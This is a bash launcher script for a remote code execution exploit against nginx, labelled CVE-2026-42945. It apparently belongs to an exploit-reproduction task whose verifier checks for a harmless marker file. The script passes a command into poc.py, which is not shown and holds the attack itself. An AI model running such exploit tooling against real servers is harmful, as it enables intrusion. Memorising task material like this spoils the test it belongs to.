#!/usr/bin/env bash
# CVE-2026-42945 ("NGINX Rift") RCE driver.
#
# Usage: bash exploit/run.sh <nonce> [host] [port]
#
# Drives the heap-overflow RCE entirely over HTTP against the nginx listener.
# The worker's redirected pool-cleanup handler runs:
#     echo <nonce> > /app/marker/<nonce>
# i.e. system() writes a marker file under /app/marker/ containing the nonce.
#
# RCE is per-attempt probabilistic; poc.py iterates sprayed-struct address
# candidates x attempts (bounded by --max-rounds) until the worker executes
# the command. This script does NOT verify success — the verifier reads the
# marker out-of-band.
set -u

# Positional arguments. The nonce is mandatory; the usage text is printed
# and the script exits when it is absent. Host and port fall back to the
# defaults shown.
readonly NONCE="${1:?usage: run.sh <nonce> [host] [port]}"
readonly HOST="${2:-127.0.0.1}"
readonly PORT="${3:-19321}"

# Directory containing this script, so poc.py is located independently of
# the caller's working directory.
SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
readonly SCRIPT_DIR

# Command string passed through to poc.py verbatim; the nonce is interpolated
# twice (file content and file name) exactly as given on the command line.
readonly CMD="echo ${NONCE} > /app/marker/${NONCE}"

# Assemble argv once, then replace this shell with the Python process so its
# exit status becomes ours.
poc_args=(
  --host "${HOST}"
  --port "${PORT}"
  --max-rounds 8
  --cmd "${CMD}"
)
exec python3 "${SCRIPT_DIR}/poc.py" "${poc_args[@]}"
